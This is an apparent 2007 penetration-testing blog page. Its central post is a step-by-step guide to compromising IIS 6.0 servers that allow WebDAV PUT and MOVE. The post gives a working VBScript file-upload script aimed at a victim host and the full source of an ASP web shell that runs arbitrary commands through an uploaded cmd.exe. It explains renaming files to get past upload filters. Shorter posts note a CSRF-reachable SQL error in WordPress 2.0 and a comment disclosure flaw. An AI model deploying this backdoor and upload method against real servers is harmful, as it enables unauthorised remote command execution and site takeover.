Recommended Books For Pentesting

June 30, 2007 Tools for Wep App Testing | Comments (0) sid @ 7:46 pm

Although, i don't have the habit of reading books, here are a few books which you may consider reading.

———– 

Database Hackers Handbook.(David Litchfield)

Oracle Hacker's handbook (David Litchfield) 

Hacking Web Applications Exposed (TMH Publications)

Essential PHP Security (Chris Shifflett)

TCP/IP Illustrated (Comer).

Hacking Linux Exposed. 

——- 

As this list is really small, it is clear that i need to read more books. If you know any good book related to pentesting (or security in general) please share it with us.

Owning IIS 6.0 When Webserver Supports Put and Move HTTP Methods

June 14, 2007 Tools for Wep App Testing, Research | Comments (1) sid @ 1:11 pm

Credits: ice  and ferruh

In IIS 6.0 you can upload the backdoor scripts but u may not be able to execute the default cmd.exe present in the iis box, so u need to upload your own cmd.exe first and then make your asp backdoor point to the cmd.exe which you uploaded.

Steps:

1. Upload cmd.exe to /scripts/ folder: Use the script below published by http://www.eggheadcafe.com/articles/20010829.asp which will allow you to upload cmd.exe (or any other binary) to the vulnerable server. You may not be able to upload a .exe file, so rename cmd.exe to  cmd.txt and then use the move method to copy it back from cmd.txt to cmd.exe. Note that cmd.exe must be copied to the /scripts/ folder of IIS where you have by default execute privileges.

Here is the upload script: 

<script language=VBSCRIPT> dim strURL function sendit( sfileName, sType) sData = getFileBytes(sfileName, sType) sfileName= mid(sfileName, InstrRev(sFileName,"\")+1,len(sfileName)) dim xmlhttp set xmlhttp=createobject("MSXML2.XMLHTTP.3.0")
strURL = "http://victim.com/scripts/" & sFileName msgbox "URL is: " & strURL xmlhttp.Open "PUT", strURL, false xmlhttp.Send sData show.innerText= "Status: " & xmlhttp.statusText set xmlhttp=Nothing End function
sub showresult()
document.write "<CENTER>Take A look!<BR><A xhref=" & strURL & ">"& strURL & "</a></CENTER>"
end sub

function getFileBytes(flnm, sType)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
if sType="on" then
objStream.Type = 1 ' adTypeBinary
else
objStream.Type = 2 ' adTypeText
objStream.Charset ="ascii"
end if
objStream.Open
objStream.LoadFromFile flnm
if sType="on" then
getFileBytes=objStream.Read
else
getFileBytes= objStream.ReadText
end if
objStream.Close
Set objStream = Nothing
end function
</script>

<TABLE align=center>
<TR><TD><input type=FILE id=filedata ></TD></TR>
<TR><TD><input type=submit onclick="Call sendit( filedata.value, filetype.value)"></TD></TR>
<TR><TD><input type=checkBox id=filetype checked >Type Binary (Uncheck for Type Text)</TD></TR>
<TR><TD><input type=button value = "SHOW IT" onclick ="showresult()"></TD></TR>
</TABLE>
<div id=show align=center></div>

2.Upload the cmd.asp file to /scripts/ folder: Use the same upload script running locally on your system to upload the cmd.asp, from (http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html)  

<!– IIS6 VBscript command shell –>

<!– aramosf@unsec.net http://www.514.es –>

<title>514 aspshell</title> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="cmd" size=45 value="<%= cmd %>">
<input type=submit value="Run">
</FORM>
<%
If (request("cmd") <> "") Then
Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)
End If
%>

You need to make the script point to the cmd.exe you uploaded in the scripts folder. You will need the absolute path, so the line:

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)

may look something like: 

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec("C:\Inetpub\Scripts\mycmd.exe /c " &

request("cmd")).stdout.readall)

You may not be able to upload the .asp file, so rename it as .txt and use the move method to copy it again as .asp on the server. That's it, job done, your backdoor should work fine now :-)

- Questions:———————-

1. How to obtain the absolute path. add this line to your backdoor:

<%=Server.Mappath("/scripts/")%> 

This will give you the full path, make necessary changes to your backdoor and upload it again.

————————–

2. What if the scripts directory is not present?

I think the attack will fail as you wont have the execute permissions:

—————————

3. Is it a good practice to not have /scripts/ folder in the document root?

Think so.

———————–
'''Syntax:'''
———————-
 Example- PUT Method:

>>Request 

PUT /foo.txt HTTP/1.1

Host: www.victim.com

Content-Length: 4

test

>>Response 

HTTP/1.1 201 Created
Date: Thu, 14 Jun 2007 09:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.victim.com/foo.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
   

————————

Example - DELETE

>>Request   

DELETE  /container/ HTTP/1.1   

Host: www.foo.bar

>>Response   

HTTP/1.1 207 Multi-Status    Content-Type: text/xml; charset="utf-8"    Content-Length: xxxx    <?xml version="1.0" encoding="utf-8" ?>    <d:multistatus xmlns:d="DAV:">      <d:response>           <d:href>http://www.foo.bar/container/resource3</d:href>           <d:status>HTTP/1.1 423 Locked</d:status>      </d:response>    </d:multistatus>

————-

Example- MOVE
>>Request

   MOVE /~fielding/index.html HTTP/1.1
   Host: www.ics.uci.edu
   Destination: http://www.ics.uci.edu/users/f/fielding/index.html

>>Response

   HTTP/1.1 201 Created
   Location: http://www.ics.uci.edu/users/f/fielding/index.html

————

More HTTP methods:http://www.webdav.org/specs/rfc2518.html
————

Undisclosed Wordpress 2.0 Security Issues

June 5, 2007 Advisories, Research | Comments (0) admin @ 2:21 pm

I recently came across this security advisory and decided to find out what the undisclosed issues could be. I downloaded wordpress 2.0 to find these undisclosed issues. Why i am interested in wordpress 2.0 is a different story though. :)
It was trivial to figure out that this version has no protection against CSRF attacks. the file wp-admin/options-reading.php has a parameter posts_per_rss that seems to have been left unsanitized. It is possible to make an admin submit (via csrf) a malicious value of this paramter which will eventually result in a database error. However, the injections seems really difficult to exploit.

example:-http://192.168.1.183:80/apache2-default/wordpress/?feed=rss2

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2007-01-08 04:12:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT 0, 10'

As the injection point is after Limit and because of the Order By clause, i think it is not exploitable.
If you think it is indeed exploitable drop me an email now…

Wordpress Unauthorized Comment Disclosure

June 1, 2007 News | Comments (0) admin @ 7:05 am

By Enumerating, the name and email address of a comment author, an attacker can read the comment submitted by the author while the comment still waits an administrator to approve it and publish it. This again points to the need for a better session management in Wordpress. Read the full story here